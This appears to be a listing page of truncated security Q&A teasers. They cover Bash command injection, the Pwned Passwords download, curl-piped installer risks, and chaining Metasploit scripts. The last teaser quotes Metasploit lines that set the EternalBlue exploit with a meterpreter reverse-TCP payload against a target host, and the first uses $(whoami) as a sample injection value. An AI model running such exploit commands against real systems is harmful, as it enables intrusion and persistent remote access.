Are these bash lines (handling untrusted user input) vulnerable to command injection?

If $1 contains untrusted user input for example $(whoami). Are any of the following bash examples vulnerable to command injection?
I’m having issues clearly understanding this behavior in Bash. Also, I have issues with echo -n "$1&quo… Continue reading Are these bash lines (handling untrusted user input) vulnerable to command injection?

How to get the pwned password list under Linux in the aera of ‘PwnedPasswordsDownloader’? [closed]

I noticed, that the direct download link to the whole list as an archive has vanished from the page at https://haveibeenpwned.com/Passwords .
It now refers to the PwnedPasswordsDownloader git-repo which offers a Windows dotNet Tool. But I … Continue reading How to get the pwned password list under Linux in the aera of ‘PwnedPasswordsDownloader’? [closed]

macapps.link – possible attack vector – could you pipe through some security script

I asked this at https://apple.stackexchange.com/questions/445343/macapps-link-possible-attack-vector-could-you-pipe-through-some-security-scr but I think this would be more appropriate place.
A work colleague said she is using https://maca… Continue reading macapps.link – possible attack vector – could you pipe through some security script

How do you place sequential metasploit rc scripts into a standard linux script [closed]

Working on a quick and easy script to exploit a system and establish persistence. To do so I have written 2 .rc scripts
use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/reverse_tcp<
set rhost 156.156.1…. Continue reading How do you place sequential metasploit rc scripts into a standard linux script [closed]